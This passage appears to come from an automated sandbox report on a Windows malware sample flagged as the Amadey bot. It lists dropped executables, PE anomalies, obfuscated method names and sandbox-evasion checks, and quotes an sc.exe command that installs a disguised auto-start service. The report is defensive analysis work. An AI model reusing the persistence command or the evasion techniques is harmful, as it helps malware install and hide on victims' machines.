                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00866873 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0086318B push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00865DE0 pushad ; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00867B53 push ss; retf
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_00538508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_0053764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D4003 push esi; retf
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_008B1D16 push 0000002Bh; iretd
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_008AF520 push ds; ret
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_004358C0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: FA5C.exe.5.drStatic PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: sbxGIUIhRd.exeStatic PE information: section name: .zas
                          Source: sbxGIUIhRd.exeStatic PE information: section name: .give
                          Source: sbxGIUIhRd.exeStatic PE information: section name: .riyevol
                          Source: CF17.exe.5.drStatic PE information: section name: .code
                          Source: 96DB.exe.5.drStatic PE information: section name: .gizi
                          Source: 96DB.exe.5.drStatic PE information: section name: .bur
                          Source: 96DB.exe.5.drStatic PE information: section name: .wob
                          Source: A15C.exe.5.drStatic PE information: section name: .code
                          Source: 95C6.exe.5.drStatic PE information: section name: .zas
                          Source: 95C6.exe.5.drStatic PE information: section name: .give
                          Source: 95C6.exe.5.drStatic PE information: section name: .riyevol
                          Source: CFE8.exe.5.drStatic PE information: section name: .sutala
                          Source: CFE8.exe.5.drStatic PE information: section name: .buve
                          Source: CFE8.exe.5.drStatic PE information: section name: .bobe
                          Source: E2A6.exe.5.drStatic PE information: section name: .tojid
                          Source: E2A6.exe.5.drStatic PE information: section name: .vese
                          Source: E2A6.exe.5.drStatic PE information: section name: .fikazap
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name: .28gybOo
                          Source: B3EB.exe.5.drStatic PE information: section name: .adata
                          Source: C487.exe.5.drStatic PE information: section name: .didata
                          Source: adijaeg.5.drStatic PE information: section name: .zas
                          Source: adijaeg.5.drStatic PE information: section name: .give
                          Source: adijaeg.5.drStatic PE information: section name: .riyevol
                          Source: gaystiqf.exe.19.drStatic PE information: section name: .tojid
                          Source: gaystiqf.exe.19.drStatic PE information: section name: .vese
                          Source: gaystiqf.exe.19.drStatic PE information: section name: .fikazap
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: FA5C.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: B3EB.exe.5.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: A15C.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x5e577
                          Source: CF17.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x67108
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96344242356
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96344242356
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.99141183454
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.9644643234
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96344242356
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.9644643234
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: FA5C.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000030.00000002.934394338.00000000007C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.934464446.000000000081C000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adijaegJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B3EB.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BBBC.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C487.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7D38.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CFE8.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CF17.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeFile created: C:\Users\user\AppData\Local\Temp\gaystiqf.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FA5C.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E2A6.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8A6B.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adijaegJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe (copy)Jump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\96DB.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\95C6.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A15C.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\txlhcyih
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\sbxgiuihrd.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\adijaeg:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: adijaeg, 0000000A.00000002.767118658.00000000005EB000.00000004.00000020.sdmpBinary or memory string: ASWHOOKLGN:
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaegKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaegKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaegKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaegKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaegKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaegKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00406AA0
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00636CF0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\explorer.exe TID: 5484Thread sleep time: -34200s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe TID: 5648Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6136Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 4292Thread sleep count: 46 > 30
